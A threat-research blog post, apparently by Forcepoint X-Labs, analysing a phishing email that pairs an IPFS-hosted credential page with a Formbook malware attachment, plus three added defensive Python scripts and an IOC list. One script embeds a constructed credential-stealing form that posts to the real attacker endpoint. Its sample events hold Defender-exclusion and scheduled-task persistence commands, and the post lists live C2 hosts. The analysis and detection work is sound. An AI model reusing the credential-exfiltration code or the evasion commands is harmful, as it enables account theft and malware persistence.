Phishing or Malware? Unpacking a Combo 2-in-1 Threat


Security researchers at Forcepoint X-Labs recently uncovered an unusual sample that blurs the line between a classic phishing scam and a malware attack. At first glance it looked like an ordinary mailbox-quota phishing email, but a closer look showed that it also carried a malicious attachment that dropped malware from the X-Worm/Formbook family. Dual delivery of this kind, where a single phishing message both harvests credentials and distributes malware, is rare and worth a closer look.

Let’s break down what made this sample so interesting. 

The Email: A Classic Phish on the Surface

Fig. 1 - Email view

 

The subject line read:

  • Subject: Your mailbox is almost full [victim.email]@[domain].com

At first, everything about the email screamed “phishing.” The sender’s address was disguised in a deceptive format that looked something like:


The format suggests that the message came from a legitimate internal source, when in reality it most likely originated from a hijacked or spoofed account.

The body followed standard phishing tactics: a brief warning that the mailbox was full and a large, urgent-looking “Clear Storage” button pressing the user to act immediately.

The Redirect: IPFS-Based Phishing Page

Clicking the button opened the following URL, served through the public ipfs[.]io gateway:

  • hxxps://ipfs[.]io/ipfs/bafkreifs2nuxey2rbsqwuv5qt6xwnopg3hhailqnk2bpw52fmqitxmzuni#[email protected]

The button led to a phishing page stored on IPFS (InterPlanetary File System), a decentralized, content-addressed network that threat actors increasingly use because content identified by a CID cannot be taken down at any single host. The path element after /ipfs/ is that CID, so the same page is reachable through any public gateway, not only ipfs[.]io; blocking by gateway hostname alone is not enough, and detection should key on the CID. The victim's address travels in the URL fragment, which the browser never sends to the gateway (so it will not appear in gateway request logs) but which the page's script can read, typically to prefill the login form. Serving the page from well-known infrastructure also makes the URL look familiar and trustworthy, which raises the chance that a user clicks through. This tactic reflects a broader trend anticipated in the Forcepoint X-Labs 2025 Future Insights report, which predicted that adversaries would increasingly exploit legitimate infrastructure to blend into normal traffic patterns and evade detection.
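Because the page is addressed by its CID rather than by the gateway host, a defender should key detection on the CID. The following Python is an added example, not Forcepoint's tooling: it refangs a defanged URL, pulls the CID out of both path-style (gateway/ipfs/<cid>) and subdomain-style (<cid>.ipfs.gateway) URLs, checks it against a blocklist, and notices when the fragment carries a victim address. The CID is the one from the URL above; the victim address, the dweb.link gateway URL and the blocklist contents are assumptions.

```python
"""Gateway-independent detection of IPFS-hosted phishing URLs.

Added example, not Forcepoint's tooling. ARTICLE_CID is the CID from the
phishing URL in the post; the victim address, the dweb.link gateway URL and
the blocklist contents are assumptions used as sample input.
"""
import re
from urllib.parse import unquote, urlparse

# CIDv0: 46-char base58btc starting with "Qm" (case-sensitive).
# CIDv1 as served by gateways: multibase "b" prefix + lowercase base32.
CID_V0 = re.compile(r"^Qm[1-9A-HJ-NP-Za-km-z]{44}$")
CID_V1_B32 = re.compile(r"^b[a-z2-7]{50,}$")

ARTICLE_CID = "bafkreifs2nuxey2rbsqwuv5qt6xwnopg3hhailqnk2bpw52fmqitxmzuni"
BLOCKED_CIDS = {ARTICLE_CID}        # assumption: blocklist fed by earlier sightings
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def refang(url: str) -> str:
    """Turn hxxp:// and [.] defanging back into a parseable URL."""
    return url.replace("hxxp", "http", 1).replace("[.]", ".")


def canonical_cid(token: str):
    """Return the CID in canonical form, or None if the token is not a CID."""
    if CID_V0.match(token):
        return token
    if CID_V1_B32.match(token.lower()):
        return token.lower()
    return None


def extract_ipfs(url: str):
    """(cid, fragment) for a path-style gateway/ipfs/<cid> or a subdomain-style
    <cid>.ipfs.gateway URL; None when the URL does not address IPFS content."""
    u = urlparse(refang(url))
    host = (u.hostname or "").lower()
    parts = [p for p in u.path.split("/") if p]
    labels = host.split(".")
    cid = None
    if len(parts) >= 2 and parts[0] == "ipfs":
        cid = canonical_cid(parts[1])
    elif len(labels) >= 3 and labels[1] == "ipfs":
        cid = canonical_cid(labels[0])
    if cid is None:
        return None
    return cid, unquote(u.fragment)


def classify(url: str) -> dict:
    """Verdict for one URL. A victim address in the fragment is a lure pattern:
    the browser never sends the fragment to the gateway, so it is invisible in
    gateway logs, but the page's script can read it to prefill the form."""
    hit = extract_ipfs(url)
    if hit is None:
        return {"ipfs": False, "verdict": "not-ipfs"}
    cid, fragment = hit
    victim = fragment if EMAIL_RE.match(fragment) else None
    if cid in BLOCKED_CIDS:
        verdict = "block"
    elif victim:
        verdict = "suspicious"
    else:
        verdict = "review"
    return {"ipfs": True, "cid": cid, "victim": victim, "verdict": verdict}


if __name__ == "__main__":
    samples = [  # constructed inputs
        "hxxps://ipfs[.]io/ipfs/" + ARTICLE_CID + "#user@example.com",
        "https://" + ARTICLE_CID + ".ipfs.dweb.link/",
        "https://ipfs.io/ipfs/notacid",
        "https://example.com/login",
    ]
    for s in samples:
        print(s, "->", classify(s))
```

The second sample shows why hostname blocking falls short: the same CID served by a different gateway still resolves to the blocked entry, because the verdict is computed from the CID alone.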

Fig. 2 - Phishing page

 

Interestingly, the phishing page did not only harvest credentials; it also gathered context about each visitor. By loading an external JavaScript file from geoplugin.net, the page could quietly look up the visitor's geographic region, and together with what the browser itself exposes (system details, local date and time) this gave the operator a profile of every victim. GeoPlugin is a legitimate geolocation API that resolves an IP address to a country, city and even latitude and longitude. These details may seem harmless, but in a phisher's hands they help tailor the scam to the victim's locale, making it feel more legitimate and increasing the chance that the victim falls for it.

Fig. 3 - Geolocation JavaScript

 

Obfuscated Code

The page's content was not served as plain HTML; it was generated by obfuscated JavaScript. A snippet of the script looked like this:

(Image: snippet of the obfuscated script)

After decoding, the purpose was clear. The script dynamically rendered a login form and, once credentials were entered, sent them in a POST request to an attacker-controlled endpoint (the newpost.php URL listed under IOCs below).

Fig. 4 - Code sample with POST request
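Triage of a saved copy of such a page can be automated. The Python below is an added example (not the article's code and not Forcepoint's tooling) that lists external script sources and flags geolocation providers, peels common JavaScript string-wrapper obfuscation (unescape, atob, String.fromCharCode), and extracts the URLs the decoded script talks to, matching them against the newpost.php IOC from this post. The sample page is constructed: its inline script is produced by percent-encoding a plaintext form so the decoder has something to unpack; geoplugin.net and the POST URL come from the article, and the page text and form field names are assumptions.

```python
"""Static triage of a saved phishing page: external script sources,
obfuscation markers, decoded script text and the URL it posts to.

Added example, not code from the article or from Forcepoint. SAMPLE_HTML is
constructed: its inline script is built by percent-encoding a plaintext
credential-stealing form so the decoder has a realistic layer to unpack.
The geoplugin.net script URL and the newpost.php POST target are from the
article; the page text and form field names are assumptions.
"""
import base64
import re
from urllib.parse import quote, unquote

GEO_PROVIDERS = {"geoplugin.net"}                  # IP-geolocation APIs seen in kits
POST_IOCS = {"http://jezzo.sbs/love/newpost.php"}  # hxxp://Jezzo[.]sbs/love/newpost[.]php
SUSPECT_CALLS = ("eval(", "unescape(", "atob(", "fromCharCode(", "document.write(")

# ---- constructed sample page ------------------------------------------------
_PLAINTEXT = (
    "document.write('<form id=\"login\"><input name=\"email\" value=\"' + "
    "location.hash.slice(1) + '\"><input name=\"pw\" type=\"password\"></form>');"
    "document.forms[0].onsubmit = function(e){e.preventDefault();"
    "var x = new XMLHttpRequest(); x.open('POST', 'http://Jezzo.sbs/love/newpost.php');"
    "x.send(new FormData(document.forms[0]));};"
)
SAMPLE_HTML = (
    "<html><body><p>Your mailbox is almost full</p>"
    '<script src="http://www.geoplugin.net/javascript.gp"></script>'
    '<script>eval(unescape("' + quote(_PLAINTEXT, safe="") + '"));</script>'
    "</body></html>"
)

_PERCENT = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
_B64 = re.compile(r'atob\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
_CHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
_URL = re.compile(r"https?://[^\s\"'<>()]+", re.I)


def _b64(s: str) -> str:
    try:
        return base64.b64decode(s).decode("utf-8", "replace")
    except (ValueError, TypeError):
        return s


def decode_layers(js: str, max_rounds: int = 5) -> str:
    """Peel unescape()/atob()/String.fromCharCode() wrappers, re-quoting the
    result as a JS string literal, until the text stops changing."""
    for _ in range(max_rounds):
        new = _PERCENT.sub(lambda m: '"' + unquote(m.group(1)) + '"', js)
        new = _B64.sub(lambda m: '"' + _b64(m.group(1)) + '"', new)
        new = _CHARCODE.sub(
            lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + '"',
            new)
        if new == js:
            break
        js = new
    return js


def external_scripts(html: str) -> list:
    return re.findall(r'<script\b[^>]*\bsrc=["\']([^"\']+)["\']', html, re.I)


def inline_scripts(html: str) -> list:
    return re.findall(r"<script\b(?![^>]*\bsrc=)[^>]*>(.*?)</script>", html, re.I | re.S)


def _host(url: str) -> str:
    m = re.match(r"https?://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def _norm(url: str) -> str:
    """Lower-case scheme and host only; the path is significant."""
    m = re.match(r"(https?)://([^/]+)(.*)", url, re.I | re.S)
    return f"{m.group(1).lower()}://{m.group(2).lower()}{m.group(3)}" if m else url


def triage(html: str) -> dict:
    ext = external_scripts(html)
    geo = [u for u in ext
           if any(_host(u) == g or _host(u).endswith("." + g) for g in GEO_PROVIDERS)]
    raw = inline_scripts(html)
    decoded = [decode_layers(s) for s in raw]
    calls = sorted({c for s in raw + decoded for c in SUSPECT_CALLS if c in s})
    urls = sorted({_norm(u) for s in decoded for u in _URL.findall(s)})
    return {
        "external_scripts": ext,
        "geolocation_scripts": geo,
        "suspect_calls": calls,
        "decoded_scripts": decoded,
        "urls_in_script": urls,
        "post_ioc_hits": [u for u in urls if u in POST_IOCS],
        # reads location.hash: the victim address is passed in the URL fragment
        "prefills_from_fragment": any("location.hash" in s for s in decoded),
    }


if __name__ == "__main__":
    for k, v in triage(SAMPLE_HTML).items():
        print(k, "=", v)
```

The decoder only handles string-wrapper obfuscation; kits that build code with arithmetic or string-concatenation tricks need a real JavaScript engine, but the POST target usually survives as a literal once the outer wrappers are gone.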

 

The Attachment: Malware in Disguise

What set this campaign apart was the malicious attachment that accompanied the email: a RAR archive with no connection to the mailbox-quota lure.

Although the attachment had no logical relation to the email's content, once extracted and executed it dropped malware from the X-Worm/Formbook family, known for:

  • Credential stealing
  • Keylogging
  • Persistence techniques
  • Anti-analysis features 

Malware Behavior Summary

Execution begins with a .NET loader, which unpacks and runs a second-stage payload that is also a .NET executable. Using .NET for both stages points to a compact delivery chain in which the second stage is most likely carried as an embedded resource and loaded in memory rather than written to disk, keeping it away from file-based scanning.
In summary, the sample exhibited the following suspicious behaviour:

  • Anti-analysis: used sleep delays, checked for an attached debugger and detected virtualized environments.
  • System modification: added Windows Defender exclusions and created scheduled tasks for persistence.
  • Network communication: attempted connections to external hosts, consistent with command-and-control (C2) traffic or data exfiltration (see the C2 list under IOCs).
  • Code injection: dropped payloads and injected them into legitimate system processes.
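Each behaviour in the summary above leaves a host-side trace that can be hunted. The Python below is an added example, not Forcepoint's detection content: it runs simple rules over constructed Sysmon-style event lines (process creation, network connection, CreateRemoteThread and registry set-value events), tags findings with MITRE ATT&CK technique IDs, and correlates a remote-thread target with the later outbound connection from that same process. The C2 hostnames are from the IOC list; the host user, PIDs and file names such as Invoice.exe and Updater.exe are assumptions.

```python
"""Hunting the behaviours in the malware summary over Sysmon-style events.

Added example, not Forcepoint's detection content. The events are constructed
JSON lines shaped like Sysmon event IDs 1 (process create), 3 (network
connect), 8 (CreateRemoteThread) and 13 (registry value set). The host user,
PIDs and the Invoice.exe / Updater.exe names are assumptions; the C2 hosts
are from the article's IOC list.
"""
import json
import re

C2_HOSTS = {"verism.xyz", "rumbtap.site", "ff87558.vip"}  # subset of the IOC list
SYSTEM_DIR = "c:\\windows\\"
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\downloads\\")
EXCLUSION_CMD = re.compile(r"(add|set)-mppreference\b.*-exclusion")

_EVENTS = [  # constructed timeline on one host, in order
    {"EventID": 1, "ProcessId": 900, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 4100, "Image": r"C:\Users\alice\AppData\Local\Temp\Invoice.exe",
     "CommandLine": "Invoice.exe", "ParentImage": r"C:\Program Files\WinRAR\WinRAR.exe"},
    {"EventID": 1, "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -Command Add-MpPreference -ExclusionPath C:\Users\alice\AppData\Local\Temp",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\Invoice.exe"},
    {"EventID": 13, "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\alice\AppData\Local\Temp",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "ProcessId": 4130, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 1 /tn Updater /tr C:\Users\alice\AppData\Roaming\Updater.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\Invoice.exe"},
    {"EventID": 8, "SourceProcessId": 4100, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\Invoice.exe",
     "TargetProcessId": 1234, "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 3, "ProcessId": 2200, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "www.example.com", "DestinationPort": 443},
    {"EventID": 3, "ProcessId": 1234, "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationHostname": "verism.xyz", "DestinationPort": 80},
]
EVENT_LINES = [json.dumps(e) for e in _EVENTS]


def _low(ev: dict, key: str) -> str:
    return str(ev.get(key, "")).lower()


def detect(lines) -> list:
    """Return (ATT&CK technique, description) findings, in event order."""
    findings = []
    injected = {}  # target PID -> image that injected into it
    for line in lines:
        ev = json.loads(line)
        eid = ev.get("EventID")
        image, cmd, parent = _low(ev, "Image"), _low(ev, "CommandLine"), _low(ev, "ParentImage")
        if eid == 1:
            if parent.endswith("\\winrar.exe") and any(d in image for d in USER_WRITABLE):
                findings.append(("T1204.002", f"executable launched from archive tool: {image}"))
            if EXCLUSION_CMD.search(cmd):
                findings.append(("T1562.001", f"Defender exclusion added via command line: {cmd}"))
            if image.endswith("\\schtasks.exe") and "/create" in cmd:
                findings.append(("T1053.005", f"scheduled task created: {cmd}"))
        elif eid == 13 and "\\windows defender\\exclusions\\" in _low(ev, "TargetObject"):
            findings.append(("T1562.001", f"Defender exclusion written to registry: {ev['TargetObject']}"))
        elif eid == 8:
            src, tgt = _low(ev, "SourceImage"), _low(ev, "TargetImage")
            # remote thread from a user-writable location into a Windows binary
            if tgt.startswith(SYSTEM_DIR) and not src.startswith(SYSTEM_DIR):
                injected[ev.get("TargetProcessId")] = src
                findings.append(("T1055", f"{src} created a remote thread in {tgt}"))
        elif eid == 3:
            host = _low(ev, "DestinationHostname")
            if host in C2_HOSTS:
                via = injected.get(ev.get("ProcessId"))
                note = f" (process previously injected by {via})" if via else ""
                findings.append(("T1071.001", f"{image} connected to C2 {host}{note}"))
    return findings


if __name__ == "__main__":
    for technique, desc in detect(EVENT_LINES):
        print(technique, desc)
```

The registry rule catches the exclusion even when it is added through the Defender API rather than PowerShell, and the injection correlation explains why the C2 beacon appears to come from svchost.exe rather than from the dropped executable.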

Conclusion

This hybrid campaign underscores the evolving tactics of threat actors. By bundling phishing with malware delivery, attackers increase their chances of success — if the phishing lure doesn’t get you, the malicious attachment might.

Protection Statement:

Forcepoint customers are protected against this threat at the following stages of attack:

  • Stage 1 (Lure) – Emails are blocked by email security analytics.
  • Stage 2 (Delivery) – Emails and malicious attachments are identified and blocked by Forcepoint Email Security.
  • Stage 3 (Redirect) – Redirection URLs within the email are identified and blocked.
  • Stage 6 (Command and Control / Call Home) – Communication attempts to C2 servers related to the phishing page and the malware attachment are blocked.

IOCs:

From address:
  [email protected]

Phish URL:
  hxxps://ipfs[.]io/ipfs/bafkreifs2nuxey2rbsqwuv5qt6xwnopg3hhailqnk2bpw52fmqitxmzuni#email@address

Post URL:
  hxxp://Jezzo[.]sbs/love/newpost[.]php

C2s:
  verism[.]xyz/x0tn/
  rumbtap[.]site/gnwh/
  ff87558[.]vip/582t/
  elementzone[.]shop/w9tj/
  beragame[.]biz/2c8x/
  fun1995[.]net/wfuw/
  instatv[.]shop/wx48/
  top10-casino25[.]buzz/w300/
  eternalethereum[.]xyz/d9jw/
  computetools[.]xyz/1t1d/
  bri[.]co[.]id/cx3e/
  ezdecnight[.]info/ilbf/
  hangten[.]tech/fnmj/
  servisyeni[.]xyz/layp/
  boldcatchpoint[.]shop/e49a/
  nysche[.]tokyo/8q4x/
  empero[.]fun/ccu2/

File hashes (SHA-1):
  29bec38ca9f41669986562d69bbfb30c46f09346  (exe)
  f99e081031ba68bf5a0e1328df6574590516ec3a  (rar)

Author: Pavlo Prodanchuk

Pavlo Prodanchuk serves as a Security Researcher with the Forcepoint X-Labs Threat Research team. He focuses on detecting and analyzing web, email, and file-based cyberattacks. Pavlo is passionate about identifying emerging threats and developing proactive defenses to enhance security across digital environments.
